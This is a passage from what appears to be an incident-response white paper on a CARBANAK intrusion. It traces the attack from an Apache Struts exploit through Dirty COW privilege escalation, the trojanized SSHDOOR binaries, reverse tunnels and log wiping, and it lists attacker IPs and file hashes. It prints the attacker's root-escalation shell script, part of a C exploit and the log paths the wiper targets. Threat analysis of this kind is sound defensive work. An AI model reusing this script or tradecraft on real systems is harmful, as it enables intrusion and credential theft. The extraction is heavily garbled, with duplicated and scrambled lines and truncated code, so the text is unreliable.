Proof ofCopy-on-Write
Concept (PoC)
Dirty
code COW
(PoC) code
by downloaded
KrE80r
to aexploit
Linux Kernel
written
KrE80r
to exploit
Linux Kernel
Copy-on-Write
Dirty COW
vulnerability,
CVE-2016-5195.
Thisthe
vulnerability
since been resolved
by the major Linux
distributions,
with
list
patched
kernels
found
GitHub.
same
time, the attacke
vulnerability, CVE-2016-5195. This vulnerability has since been resolved
downloaded a Bash shell script as a driver for the exploit code, named
1.sh
. This allowed the
by the major Linux distributions, with the list of patched kernels found on
attackers to gain13root privileges on the system at the 27-minute mark. The observed download
At the same time, the attackers downloaded a Bash shell script as
is shown GitHub.
in Figure 5.
a driver for the exploit code, named
1.sh
. This allowed the attackers to gain
The!Shadows!of!Gh
root privileges on the system at the 27-minute mark. The observed
download
Case!Study:!CARBAN
is shown in Figure 5.
Common Vulnerabilities and Exposures
; https://cve.mitre.org/cgibin/cvename.cgi?name=CVE-2016-5195
Benvenuto;
Patched Kernel Versions
https://github.com/dirtycow/dirtycow.github.io/wiki/Patched-Kernel-Versions
Page
Figure
Downloadof
of CVE-2016-5195 Exploit
Bash
Script
Driver
Figure
5:5:
Download
ExploitCode
Codeand
Bash
Script
Driver
Common Vulnerabilities and Exposures
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
While the attackers
Patched
had root
level
access, they did not have user credentials to move
Benvenuto;
Kernel
Versions
laterally withinhttps://github.com/dirtycow/dirtycow.github.io/wiki/Patched-Kernel-Versions
the environment. In order to gain that access, the attackers downloaded versi
of the OpenSSH 5.3p1 client and server binaries that had been trojanized with malware know
as SSHDOOR,14 and installed them onto host ALPHA. The SSHDOOR malware will beacon o
WHITE PAPER
While the attackers now had root level access, they did not have user
credentials to move laterally within the environment. In order to gain that
access, the attackers downloaded versions of the OpenSSH 5.3p1 client and
server binaries that had been trojanized with malware known as SSHDOOR,14
and installed them onto host ALPHA. The SSHDOOR malware will beacon out
to IP 185.61.148.96 every 10 minutes until a response is received. A secondary
function of this malware was credential theft, by which SSHDOOR sends the
username, password and source/destination host to the attackers. The attackers
then disengage, leaving the malware to collect credentials until the next day.
3.1.3 Phase 3: D+1 through D+3
Lateral Movement, Secondary Ingress, Internal Reconnaissance,
Credential Harvesting
Upon gaining credentials via the SSHDOOR malware, attackers respond to
the SSHDOOR beaconing and establish an SSH tunnel to IP 95.215.46.116
over TCP port 443. In reviewing the configuration and running processes on
ALPHA, the attackers observed that the system was running winbind, the UNIX
implementations of Microsoft RPC, Pluggable Authentication Modules (PAM)
and the name service switch (NSS). This service allows for unified logins across
UNIX systems and Microsoft Windows Active Directory (AD). Winbind is a
component of samba, the Windows interoperability suite for Linux and UNIX,
which stores information about Windows Active Directory in its configuration
files. After observing this service running on the system, the attackers checked
these configuration files for the DNS names of the Microsoft Windows Domain
Controllers used by winbind to authenticate AD accounts. Upon conducting
a DNS query for the domain name in the configuration file, the attackers
gained the names and IP addresses of the two primary DNS servers (also
Windows Domain Controllers) and the server listed in the configuration file.
Subsequently, the attackers download a tool named WINEXE, a Linux binary
that allows remote command execution on Windows systems.
Linux.Sshdoor
https://www.symantec.com/security_response/writeup.jsp?docid=2013-012808-1032-99
WHITE PAPER
The!Shadows!of!G
Case!Study:!CARB
Figure 6: Download of Winexe via WGET to ALPHA
Figure 6: Download of Winexe via WGET to ALPHA
The attackers used credentials taken by the SSHDOOR malware to log in to
The attackers used credentials taken by the SSHDOOR malware to log in to each of the
of the Windows
servers, running
the qwinsta.exe
and tasklist.exe
binaries
Windows servers,each
running
the qwinsta.exe
and tasklist.exe
binaries
on each
and then loggin
on each and then logging out.
out.
3.1.4 Phase 4: D+3 through D+25
Privilege
Escalation,D+25
Internal Reconnaissance, Persistence, Entrenchment,
3.1.4! Phase 4: D+3
through
Lateral Movement
Privilege Escalation, Internal Reconnaissance, Persistence, Entrenchment, Lateral Movemen
The attackers also observed that one of the Windows Domain-authenticated
credentials
stolen
the of
service
for the
client
s authenticated
The attackers also
observed
that
the account
Windows
Domain-authenticated
credentials stol
was the service account
forscans,
the client
authenticated
scans,
and was present i
vulnerability
and was present
in the localvulnerability
sudoers
file. Having
determined
local
sudoers
file.
determined
the current
level
of access
available
to them, the
theHaving
current level
of access available
to them,
the attackers
decided
to download
attackers decidedadditional
to download
toolsa in
order
establish
a static entry point into
tools inadditional
order to establish
static
entrytopoint
into the environment
environment ensuring
they
avoid
detection.
To accomplish
this, the attackers downloa
ensuring
theycould
could avoid
detection.
To accomplish
this, the attackers
the PSCAN TCP port
scanner
Advanced
Wiper
binaries
and began identify
downloaded the PSCAN TCP port scanner and the ALW Advanced Log Wiper
systems and services accessible from ALPHA.
binaries and began identifying systems and services accessible from ALPHA.
WHITE PAPER
The!Shadows!of!Ghos
Case!Study:!CARBANA
Figure
Downloadof
of ALW
ALW and
95.215.46.116
Figure
7:7:
Download
andPSCAN
PSCANfrom
from
95.215.46.116
One of these
Red Hatserver,
Satellitewhich
server,iswhich
is the primary
One of these systems
was systems
the Redwas
Hatthe
Satellite
the primary
enterprise update
updateLinux
server(RHEL)
for Red deployments.
Hat Enterprise Linux
deployments.
server for Red enterprise
Hat Enterprise
Given(RHEL)
that the
Satellite server require
the ability to interact
with
other systems
underthe
root to
user
in order
update software, th
Given that
theall
Satellite
server requires
ability
interact
with to
all other
attackers chose
this
system
their
initial
primary
staging
system.
This
system
was designated
systems under the root user in order to update software, the attackers
system BRAVO. From BRAVO, the attackers traversed the Linux environment through stolen
chose this system as their initial primary staging system. This system was
credentials and SSH pre-shared keys and conducted internal reconnaissance on any Windows
systemaccess.
BRAVO.During
From BRAVO,
the attackers
traversed
the contained all
systems withindesignated
direct network
this time,
the attackers
strictly
environment
stolennetwork
credentials
and SSH pre-shared
andenvironment.
malicious files,Linux
secondary
tools through
and ingress
communication
to thekeys
Linux
conducted
internaltested
reconnaissance
onvulnerability
any Windows on
systems
direct
Additionally, they
consistently
the Struts
host within
ALPHA
to ensure the initi
method of compromise
was open,
alert
to any
possible
remediation
of that system
network access.
Duringand
thisto
time,
thethem
attackers
strictly
contained
all malicious
files, secondary tools and ingress network communication to the Linux
environment.
Additionally,
3.1.5! Phase 5:
D+25 through
D+30they consistently tested the Struts vulnerability
on host ALPHA to ensure the initial method of compromise was open, and to
Disruption, Adaptive Action, Entrenchment, Lateral Movement, Persistence
alert them to any possible remediation of that system.
The discovery of the Struts vulnerability on host ALPHA, and its subsequent remediation, gave
3.1.5 Phase 5: D+25 through D+30
the attackers a moment of pause, and they migrated a copy of the SSHDOOR client and serve
Disruption,
Movement,
to the centralized
SyslogAdaptive
server,Action,
alongEntrenchment,
with a copy Lateral
of WINEXE,
thePersistence
ALW Log Wiper and their
own SSH pre-shared
key,
which
they
installed
seven
at this point.
The discovery of the Struts vulnerability on host ALPHA, and its systems
subsequent
They utilized the
wiper
Syslog
server,
designated
system
CHARLIE,
in order to
remediation, gave the attackers a moment of pause, and they migrated a copy
remove any log traces of their activities to date at the centralized source and hinder any follow
of the SSHDOOR client and server to the centralized Syslog server, along
with a copy of WINEXE, the ALW Log Wiper and their own SSH pre-shared
Page
key, all of which they had installed on seven key systems at this point. They
WHITE PAPER
utilized the ALW log wiper on the Syslog server, designated !system CHARLIE,
The!Shadows!of!G
in order to remove any log traces of their activities to date at
! the centralized
Case!Study:!CARB
! would use
source and hinder any follow-on investigations. The attackers
on investigations. system
The attackers
would
system
CHARLIE
their
primary
Linux egress
CHARLIE as their primary Linux egress point for the rest of
for the rest of theincident,
incident,
though
they ensure
wouldthat
ensure
that the binaries
SSHDOOR
binaries remaine
though
they would
the SSHDOOR
remained
BRAVO as a backup
ingress
mechanism.
Additionally,
they
downloaded
on BRAVO as a backup ingress mechanism. Additionally, they downloadedAUDITUNNEL
Reverse Tunnelingthe
tool
to host CHARLIE
and began
this as and
their
primary
AUDITUNNEL
Reverse Tunneling
tool tousing
host CHARLIE
began
using method of
ingress to the Linux
This was
assumedly
done
to transition
thisenvironment.
as their primary method
of ingress
to the Linux
environment.
This to
wasa new ingress
method should any investigation around the remediation of ALPHA identify the SSHDOOR
assumedly done to transition to a new ingress method should any investigation
malware.
around the remediation of ALPHA identify the SSHDOOR malware.
Figure
8: AUDITUNNELDownload
Download from
95.215.46.116
Figure
8: AUDITUNNEL
from
95.215.46.116
To ensure
they
could retain
they replaced
SSHDOOR
To ensure they could
retain
access,
theyaccess,
replaced
SSHDOOR
with with
AUDITUNNEL on four o
four of the key
systems. They
any significant until D+29, at wh
key systems. TheyAUDITUNNEL
ceased anyonsignificant
operation
into ceased
the environment
operation into
environment until
D+29, atmethods
which timewere
both the
time both the SSHDOOR
andthe
AUDITUNNEL
ingress
stillSSHDOOR
operational. On D+
the attackers migrate
into the Windows
server were
environment
proper
to find
and AUDITUNNEL
ingress methods
still operational.
On D+30,
thean appropriate
staging system toattackers
install malware
staging
ingress within
Windows
environme
migrate into
the begin
Windows
server environment
proper
to find
After three failed attempts,
attackers
find
Windows
Domain
Controller
with
appropriate staging system to install malware and begin staging ingress within Internet
access, designated
DELTA.
thesystem
Windows
environment. After three failed attempts, the attackers find a
Windows Domain Controller with Internet access, designated system DELTA.
3.1.6! Phase 6: D+30
through
D+44
3.1.6 Phase
6: D+30
through D+44
Movement, Entrenchment,
Persistence, Entrenchment,
Internal
Reconnaissance, Credential Harves
Lateral Movement,Lateral
Persistence,
Internal
Reconnaissance,
Credential Harvesting
Once firmly on DELTA,
the on
attackers
downloaded
and installed
the GOTROJ
Once firmly
DELTA, the
attackers downloaded
and installed
the GOTROJmalware as th
primary method ofmalware
ingress
into
Windows
environment.
this
point,
they have secured
as their primary method of ingress into the Windows environment.
methods of ingress into the environment across three different ingress methods. In order t
At this point, they have secured nine methods of ingress into the environment
ensure ingress via the GOTROJ channel, the actors execute the malware into memory on t
across three different ingress methods. In order to ensure ingress via the
additional systems, putting the system ingress count at twelve systems. Once the malware
GOTROJ channel, the actors execute the malware into memory on three
persistent and tested on DELTA, the attackers download a Windows version of WGET and
additional tool
systems,
putting the
system ingress
counttraversing
at twelve systems.
Once
TINYP lateral movement
to system
DELTA
and begin
the Windows
environ
malware
persistent
tested
DELTA,
attackers
download
As they move through the environment, they download a secondary versiona of TINYP, a h
Windows
of WGET
and thelisting
TINYP lateral
movement
toola to
system version of
reconnaissance tool
calledversion
INFOS,
a process
tool called
CCS,
custom
DELTA
begin
traversing
Windows
environment.
they
move
through
MIMIKATZ, a Windows version of the previously mentioned PSCAN scanner,
and the PuTT
Secure Copy tool called PSCP.
WHITE PAPER
the environment, they download a secondary version of TINYP, a host
reconnaissance tool called INFOS, a process listing tool called CCS, a custom
version of MIMIKATZ, a Windows version of the previously
mentioned
PSCAN
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
scanner, and the PuTTY Secure Copy tool called PSCP.
Figure
9: Windows
Toolset
Download
ofTINYP,
WGET,INFOS,
TINYP,CCS,
INFOS,
CCS, MIMIKATZ,
Figure
9: Windows
Toolset
Download
of WGET,
MIMIKATZ,
PSCP and PSCAN
PSCP and PSCAN
During this time, it becomes quickly apparent that the attackers are targeting critical financial
data, based on commands, string searches and lateral movement decisions conducted by the
During
time, ituntil
becomes
quicklyat
apparent
that
the attackers
are targeting
attackers.
Thisthis
continues
D+43/D+44,
which time
a coordinated
expulsion
event took
place and
post-remediation
activities
began.
critical financial data, based on commands, string searches and lateral
movement decisions conducted by the attackers. This continues until D+43/
D+44, at which time a coordinated expulsion event took place and postThe client
contactedactivities
RSA IR when
system administrators observed anomalies associated with the
remediation
began.
3.2! Detection and Response
root
user on system ALPHA during remediation. These anomalies were brought to the attention
of client security personnel. The CVE-2017-5638 vulnerability present on system ALPHA was
3.2 25
DETECTION
identified
days (D+25)
afterRESPONSE
the initial compromise when hundreds of thousands of successful
vulnerability
scanning
and exploit
sessions
against the
system wereobserved
observed. anomalies
The vulnerability
The client
contacted
RSA IR
when system
administrators
was determined to have been introduced by an out-of-band source installation of an affected
associated
thewhich
root
user
on system
during
remediation.
version
of Apache with
Struts,
been
installedALPHA
by the web
developers.
While These
organization
had taken
the necessary
to remediate
patch all
systems reported
anomalies
were brought
to thesteps
attention
of client
security
personnel.
vulnerable to CVE-2017-5638, the vulnerable web page on system ALPHA was not detected
CVE-2017-5638 vulnerability present on system ALPHA was identified 25
due to the web server and operating system reporting that the affected package was not
daysBased
(D+25)
after
the initial
compromise
whenexploit
hundreds
of thousands
of from the
installed.
on the
extensive
number
of successful
attempts
that ranged
returnsuccessful
of a pre-defined
character
string
successful
downloading
execution
vulnerability scanning and exploit sessions against the systemmalicious
were
code, system ALPHA was removed from service, a forensic image was obtained for in-depth
observed.
vulnerability
determined
have
been
introduced
analysis and the system was restored and remediated. The forensic image was made available to
RSA IR
upon engagement
services, with
IR beginning
threat
huntingStruts,
actionswhich
and followout-of-band
sourceofinstallation
of an
affected
version
of Apache
on investigations on D+35.
had been installed by the web developers. While the organization had taken
Duringthe
threat
huntingsteps
operations
conducted
in patch
concertallwith
client reported
analysts, RSA
IR identified
necessary
to remediate
systems
vulnerable
increasingly suspect outbound binary and administrative network communication being
CVE-2017-5638, the vulnerable web page on system ALPHA was not detected
Page 17
due to the web server and operating system reporting that the affected
package was not installed. Based on the extensive number of successful exploit
attempts that ranged from the return of a pre-defined character string to
successful downloading and execution of malicious code, system ALPHA was
removed from service, a forensic image was obtained for in-depth analysis
and the system was restored and remediated. The forensic image was made
WHITE PAPER
available to RSA IR upon engagement of services, with RSA IR beginning threat
hunting actions and follow-on investigations on D+35.
During threat hunting operations conducted in concert with client analysts,
RSA IR identified increasingly suspect outbound binary and administrative
network communication being conducted with external
hosts.
! internet
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
Specifically, RSA IR observed the GOTROJ traffic communicating outbound to
IP 107.181.246.146,
and client
observed
the PSEXESVC.exe
conducted
with external internet
hosts. analysts
Specifically,
RSA IR observed
the GOTROJservice
traffic
communicating
outbound
107.181.246.146,
client
analysts
observed
The!Shadows!of!Ghosts!
binary present and executing on system DELTA. Both! of these
initial the
findings
PSEXESVC.exe service binary present and executing on system
Both of these initial
! DELTA.
Case!Study:!CARBANAK!
are are
shown
in Figure
1010and
findings
shown
in Figure
andFigure
Figure 11,
11, respectively.
respectively.
conducted with external internet hosts. Specifically, RSA IR observed the GOTROJ traffic
communicating outbound to IP 107.181.246.146, and client analysts observed the
PSEXESVC.exe service binary present and executing on system DELTA. Both of these initial
findings are shown in Figure 10 and Figure 11, respectively.
Delet
Delet
Delet
Deleted: Intern
Deleted: Comm
Deleted:
Comment [A32
FigureFigure
10: Initial
Finding of GOTROJ Communications with Suspect Meta
10: Initial Finding of GOTROJ Communications with Suspect Meta
Figure 10: Initial Finding of GOTROJ Communications with Suspect Meta
CommentComm
[A33
Figure 11:
Initial
Finding
Lateral
Movement
Figure
11: Initial
Findingof
of TINYP
TINYP Lateral
Movement
Figure 11: Initial Finding of TINYP Lateral Movement
Correlation of these suspect security events was declared an incident on D+35, with RSA IR
Correlation
of these
suspect
security
events
wasAtdeclared
being immediately
engaged
for incident
response
services.
this point inan
theincident
intrusion, on
Correlation
of these
suspect
was declared
incident on D+35, with RSA IR
attackers
had just
enteredsecurity
Stage 5,events
as described
in Sectionan
3.1.5.
D+35,
with
being
immediately
engaged
incident
response
services.
being immediately engaged for incident response services. At this point in the intrusion, the
Logs and
Packets
for network
visibility,
RSA IR identified
attackers
just NetWitness
entered
Stage
5, as
described
in Section
3.1.5.
AtUtilizing
this
point
in the intrusion,
attackers
just
entered
Stageall
5,network
communication channels utilized by the attackers for the duration of the incident. This assisted
described
in Section
3.1.5.
Page 18
Utilizing
RSA NetWitness
Logs
and Packets for network visibility, RSA IR identified all network
communication channels utilized by the attackers for the duration of the incident. This assisted
Deleted: Incide
Deleted: Respo
Deleted:
Deleted:
Page 18
Utilizing RSA NetWitness Logs and Packets for network visibility, RSA IR
identified all network communication channels utilized by the attackers for
the duration of the incident. This assisted greatly in conducting root cause
analysis and intrusion scoping, as a significant amount of host forensic
artifacts had been destroyed, bypassed or made unusable by the attackers.
Delet
Delet
Delet
Delet
WHITE PAPER
Additionally, the use of this level of visibility allowed RSA IR to conduct
network protocol analysis on the command and control (C2) communication
payloads, which led to the capability to decrypt attacker C2 communications
within minutes of their occurrence. This level of visibility into attacker activity
greatly assisted in containment, eradication and remediation efforts, which
concluded on D+44. Upon conclusion of the incident, RSA IR determined that
the attackers had accessed 154 systems, the majority of which were accessed
laterally via ingress channels established on systems ALPHA, BRAVO,
CHARLIE and DELTA. Follow-on analysis of acquired host, network and disk
forensic data occurred in parallel with continuous monitoring and Threat
Hunting operations until incident closure on D+74.
Utilizing RSA NetWitness Endpoint for host visibility, RSA IR was able to
observe and track specific behavioral indicators of compromise (IOCs)
identifying attacker activity within the environment. As the attackers were
particularly careful to remove all traces of their activity upon completion
and ensure their tools were on disk while in use, many traditional artifacts or
log-based incident response and forensics methodologies would have been
ineffective in identifying, investigating and responding to these attackers
methods. However, utilizing RSA NetWitness Endpoint in concert with RSA
NetWitness Logs and Packets allowed RSA IR to use the attackers
methods
as IOCs, such as specific file download methods with subsequent deletions,
specific command-line arguments used by the attackers for lateral movement,
and specific Windows user status command executions.
WHITE PAPER
4. INTRUSION DETAILS
4.1 INITIAL COMPROMISE: APACHE STRUTS2
In late March of 2017, in the midst of several hundred thousand external
vulnerability scanning attempts, an attacker using the IP address of
185.117.88.97 executed an HTTP request against system ALPHA and
exploited the Apache Struts Content-Type remote command execution
vulnerability, CVE-2017-5638, in order to download and execute a Perl script
named
from the IP address 95.215.45.116. Due to retention at the time
of analysis, neither the Perl script nor the complete command used to initiate
the download was obtained. Actions during this time were observed by
network metadata creation.
Almost six minutes later, system ALPHA began communicating with IP
address 95.216.45.116 via IRC over TCP port 80. This was the initial method
of direct system communication utilized by the actors, in which they began
immediate attempts to escalate privilege to the root user.
4.2 LINUX COMPROMISE AND MALICIOUS FILES
4.2.1
Dirty COW
Driver Script and Kre80r Proof of Concept Code
Since the privilege-separation account for the web application server
was not sufficient for follow-on actions, the attackers downloaded a shell
script named
1.sh
that exploited the
Dirty COW
Linux Kernel Privilege
Escalation vulnerability, CVE-2016-5165, from IP address 185.61.148.145.
The other downloaded file was a modified version of the PTRACE_POKEDATA
variant of CVE-2016-5195 POC code written by GitHub user
KrE80r.
. The contents of both files are shown in Figure 12 and Figure 13, with the
detection of this activity shown in RSA NetWitness Suite in Figure 14.
#!/bin/bash
/bin/cp /bin/bash /tmp/sbash
/bin/chmod 4755 /tmp/sbash
chmod +x /tmp/x
./cow &
echo
trying...
sleep 2
while true
echo > /dev/tcp/0/22
if [ -f
/tmp/sbash
then killall -9 cow
rm -f /tmp/x cow cow.c
/tmp/sbash -p -c
rm -f /usr/sbin/sshd; cp /tmp/sshd.bak /usr/sbin/
sshd;chown 0:0 /usr/sbin/sshd;chmod +x /usr/sbin/sshd;id
WHITE PAPER
/tmp/sbash -p
exit
else
echo
trying...
killall -9 cow
./cow &
sleep 0.2
done
Figure 12: Contents of
1.sh
Dirty COW Shell Script
#include
#include
#include
#include
#include
#include
#include
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
char suid_binary[] =
/usr/sbin/sshd
unsigned char shell_code[] =
#!/tmp/x\n
unsigned int sc_len = 9;
void *madviseThread(void *arg) {
int i,c=0;
for(i=0;i<200000;i++)
c+=madvise(map,100,MADV_DONTNEED);
int main(int argc,char *argv[]){
f=open(suid_binary,O_RDONLY);
fstat(f,&st);
map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
pid=fork();
if(pid){
waitpid(pid,NULL,0);
int i,o,c=0,l=sc_len;
for(i=0;i<100000;i++)
for(o=0;o ThisIsYourPassword:root@192.168.163.185
Figure 17: Credential Harvesting HTTP Request
Additionally, both versions of SSHDOOR allow unauthorized access when
authenticated with the decrypted SSH pre-shared key. These trojanized binaries
allowed the attackers to gain additional credentials that would assist them in
moving laterally into the internal server environment. The authorized_hosts
entry the attackers utilized with the SSHDOOR binary is shown in Figure 18.
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDAkqHYDX7rAoj6DNKLe4e
7a7XFrbMRErtd6y/shqDaxSMMlXAfK6P2OQE9FmPPLDWjgkDgSyOvC0g
TyghdGYdgKMV4DnhFiMMt4atOWwI86w71q9SEVGKKGVWLhIaCn
GpWkWQmGGGnCOHbLezhLTnv98wscNdZLVafTOM/HqWkRcpr2XTO
Phag/6FsXQsMKnJOZqloG5MWwdaYyIXBYEGRCA103MPmimW2jq
Y91JxQ+7xEeD4XB1s9gNakHuQsDNNYY63kfiG8UAbOGQq
88mpsB32Ofjz6qdAgYPzBZzCoMnvhtDSTyKPYjoeDEHXMWZU
/3PZbjuejbM8v5F9FiH4p centos-repo.org
Figure 18: Pre-Shared SSH Key Used by SSHDOOR
The file information for the SSHDOOR client and server binaries with the C2
address of centos-repo.org are shown in Table 1 and Table 2, respectively.
File Name : ssh
File Size : 1,180,393 bytes
: 0810d239169a13fc0e2e53fc72d2e5f0
SHA1
: 60a0c1042644cdc8189af1917cb14278f64f17e8
Table 1: File Information for the SSHDOOR Client Binary (centos-repo.org)
File Name : sshd
File Size : 1,614,981 bytes
: d66e31794836dfd2c344d0be435c6d12
SHA1
: a065244522b6b26c033dfbc3383b93dba776c37d
Table 2: File Information for the SSHDOOR Server Binary (centos-repo.org)
WHITE PAPER
The file information for the SSHDOOR client and server binaries with the C2
address of slpar.org are shown in Table 3 and Table 4, respectively.
File Name : ssh
File Size : 1,180,521 bytes
: a365fd9076af4d841c84accd58287801
SHA1
: ba2f90f85cada4be24d925cbff0c2efea6e7f3a8
Table 3: File Information for SSHDOOR Client Binary (slpar.org)
SHA1
File Name : sshd
File Size : 1,614,437 bytes
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
: 9e2e4df27698615df92822646dc9e16b!
:: 96e56c39f38b4ef5ac4196ca12742127f286c6fa
a365fd9076af4d841c84accd58287801
SHA1
: ba2f90f85cada4be24d925cbff0c2efea6e7f3a8
Table
4:3:File
Server
Binary
(slpar.org)
Table
FileInformation
Information for
for SSHDOOR
SSHDOOR Client
Binary
(slpar.org)
File Name
: sshd
4.2.3 AudiTunnel
File Size
: 1,614,437 bytes
The AUDITUNNEL
binary is a reverse tunneling tool similar in functionality to
: 9e2e4df27698615df92822646dc9e16b
SHA1 netcat, but with
: 96e56c39f38b4ef5ac4196ca12742127f286c6fa
support for multiple tunnels, Socks5 proxy and XOR encoded
communication.
It was
downloaded,
withServer
the SSHDOOR
binaries from
Table 4:
File Information
for along
SSHDOOR
Binary (slpar.org)
95.215.46.116, under the name
auditd.
Upon execution, it creates a TCP socket
4.2.3! AudiTunnel
and connects to C2 IP address 95.215.46.116 over TCP/443, creating a reverse
The AUDITUNNEL binary is a reverse tunneling tool similar in functionality to netcat, but with
to allow
accessSocks5
to theproxy
victimand
server.
the connection
was made,
support tunnel
for multiple
tunnels,
XOROnce
encoded
communication.
It was
downloaded,
along withwould
the SSHDOOR
binaries from
95.215.46.116,
under
the name
auditd.
AUDITUNNEL
keep the connection
alive
to allow inbound
or outbound
Upon execution, it creates a TCP socket and connects to C2 IP address 95.215.46.116 over
connectivity through this tunnel. In order to better hide its network activity,
TCP/443, creating a reverse tunnel to allow access to the victim server. Once the connection was
this utility would
all data
passed through
theallow
tunnel
with aor
of 0x41.connectivity
made, AUDITUNNEL
would
keep
the connection
alive to
inbound
outbound
throughThis
this binary
tunnel.isInalso
order
toto
better
hide its network
this utility
would
XOR all data
able
communicate
via the activity,
Socks5 protocol
using
Basic
passed through the tunnel with a key of 0x41. This binary is also able to communicate via the
authentication.
These
three binariesThese
proved
to be
the attackers
primary
Socks5 protocol
using Basic
authentication.
three
binaries
proved to
be the method
attackers
primary of
method
ingress
and credential
harvesting
for the
halfincident.
of the incident.
An example
ingressofand
credential
harvesting
for the first
halffirst
of the
An example
of the XOR network traffic associated with AUDITUNNEL is shown in Figure 19.
of the XOR network traffic associated with AUDITUNNEL is shown in Figure 19.
Figure 19: XOR 0x41 Traffic for AudiTunnel
Page 25
WHITE PAPER
After the attackers observed little change to their malware C2 channels
once system ALPHA was remediated, the attackers quickly moved to system
CHARLIE, the Linux Syslog server. This allowed them a communication
channel to all other systems within the Linux environment, as well as allowing
the attackers to control both centralized and local log entries across all Linux
systems accessed. At this time, the attackers moved the majority of their
toolset to CHARLIE, leaving only the SSHDOOR server binary on system
ALPHA for further credential harvesting. The Syslog server would remain one
of their primary staging points throughout the rest of the incident.
The file information for AUDITUNNEL is shown in Table 5.
File Name : auditd
File Size : 21,616 bytes
: b57dc2bc16dfdb3de55923aef9a98401
SHA1
: 1d3501b30183ba213fb4c22a00d89db6fd50cc34
Table 5: File Information for AUDITUNNEL
4.3 LINUX SECONDARY ATTACKER TOOLS
The attackers downloaded additional tools from IP address 95.215.46.116
for the purposes of conducting internal reconnaissance and moving laterally
between the Linux and Windows environments. These tools included the
WINEXE version 1.1 remote command execution utility, a version of the
ALW
Advanced Log Wiper
posted by
security40bscurity at 0xbscured.net
posted to Pastebin on July 7, 2015, and SecPoint
s PSCAN multithreaded IP
port scanner. With these tools, the attackers traversed the internal network
beginning with the shortest hop points first and migrating outward. Example
executions of each of these tools are shown in Figure 20 through Figure 23.
4.3.1 Winexe
WINEXE is the Windows Remote Command Execution tool for Linux. Its
functionality is very similar to that of SysInternals PSEXEC, including the
creation of a Windows service and file transfer of a service binary into the
ADMIN$ Windows SMB shared location (C:\Windows). As is described in Figure
20, the command line options are very similar to that of PSEXEC as well.
WHITE PAPER
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
Figure
20: Usage Message for WINEXE Binary
Figure 20: Usage Message for WINEXE Binary
The file information
for is
WINEXE
is shown
in Table 6.
The file information
for WINEXE
shown in
Table 6.
File NameFile Name: :winexe
winexe
File Size
: 8,126,714 bytes
File Size : :edce844a219c7534e6a1e7c77c3cb020
8,126,714 bytes
SHA1
: :286bf53934aa33ddf220d61c394af79221a152f1
edce844a219c7534e6a1e7c77c3cb020
SHA1
: 286bf53934aa33ddf220d61c394af79221a152f1
Table 6: File Information for WINEXE
4.3.2 ALW (Advanced Log Wiper,
The ALW Advanced Log Wiper was initially downloaded to system BRAVO
early in the intrusion as a method of removing specific indications of
attacker activities from Linux host logs. ALW was originally written by
security40bscurity
and posted to Pastebin on July 7, 2015. This binary takes
Page 27
WHITE PAPER
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
Table 6: File Information for WINEXE
4.3.2! ALW (Advanced Log Wiper,
four
arguments:
theWiper
userwas
to remove
from the to
target
logs,
the early
host in
tothe
remove
Advanced Log
initially downloaded
system
BRAVO
intrusion
as a method of removing specific indications of attacker activities from Linux host logs. ALW
from the target logs, a specific terminal TTY value to remove from the target
was originally written by
security40bscurity
and posted to Pastebin on July 7, 2015. This binary
takes
the userlog
to remove
from the target
logs, the
host to remove
from
logs,four
or arguments:
a specific target
file to remove.
The usage
message
for this
binary
target logs, a specific terminal TTY value to remove from the target logs, or a specific target log
is to
shown
in The
Figure
file
remove.
usage
message for this binary is shown in Figure 21.
Figure 21: Usage Message for l Advanced Log Wiper
Deleted:
Deleted:
Deleted:
Figure 21: Usage Message for l Advanced Log Wiper
Comment
deleted? I
Figures.
If no file argument is given, ALW will remove all log entries with the specified
Logs
Modified
by ALW
user, host or TTY from the
following
logs:
Deleted: ,
If no file argument is given, ALW will remove all log entries with the specified user, host or TTY
from the following logs:
Formatted
utmp
wtmp
Logslast
Modified by ALW
/var/log/secure
utmp/var/log/auth.log
/var/log/messages
wtmp
/var/log/audit/audit.log
last /var/log/httpd-access.log
/var/log/httpd-error.log
/var/log/xferlog
/var/log/secure
Table 7: Logs Modified by ALW Log Wiper
/var/log/auth.log
The file information for ALW
is shown in Table 8.
/var/log/messages
File Name
File Size
SHA1
Formatted
: l /var/log/audit/audit.log
: 16,333 bytes
: 771fa63231fb42ee97aa17818a53f432
/var/log/httpd-access.log
: 149a9270d9160120229b7c088975c2754e3b5333
/var/log/httpd-error.log
Table 8: File Information for ALW
4.3.3! PSCAN
/var/log/xferlog
The PSCAN binary found Table
on host
is a TCP port
scanning
tool that attempts to create
7:BRAVO
Logs Modified
by ALW
Log Wiper
TCP socket connections to a specified port for every IP within a specified range. This functionality
allows the attacker to check if specific commonly used ports are open for communication in
The file information for ALW is shown in Table 8.
Page 28
File Name : l
File Size : 16,333 bytes
: 771fa63231fb42ee97aa17818a53f432
SHA1
: 149a9270d9160120229b7c088975c2754e3b5333
Table 8: File Information for ALW
4.3.3 PSCAN
The PSCAN binary found on host BRAVO is a TCP port scanning tool that
attempts to create TCP socket connections to a specified port for every IP
within a specified range. This functionality allows the attacker to check if
specific commonly used ports are open for communication in systems within
an IP range, thereby identifying available services for internal reconnaissance.
The usage message for PSCAN is shown in Figure 22.
Deleted:
WHITE PAPER
The!Shadows!of!Gh
Case!Study:!CARBA
systems within an IP range, thereby identifying available services for internal reconnaissance
The usage message for PSCAN is shown in Figure 22.
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
systems within an IP range, thereby identifying available services for internal reconnaissance.
The usage message for PSCAN is shown in Figure 22.
Figure
Usage
Message for
for PSCAN
ToolTool
Figure
22:22:
Usage
Message
PSCANPort
PortScanning
Scanning
Figure 22: Usage Message for PSCAN Port Scanning Tool
example
execution
PSCAN
shown
in23,
Figure
23, information
with
theinformation
file
An example
of PSCAN
is shown
Figure 23,
withwith
the filethe
for this binary for this bina
An example execution
ofexecution
PSCAN
isofshown
inisinFigure
file
shown in Table for
9. this binary shown in Table 9.
information
shown in Table 9.
Figure 23: Example Usage of PSCAN Port Scanning Tool
File Name
File Size
File Name
SHA1
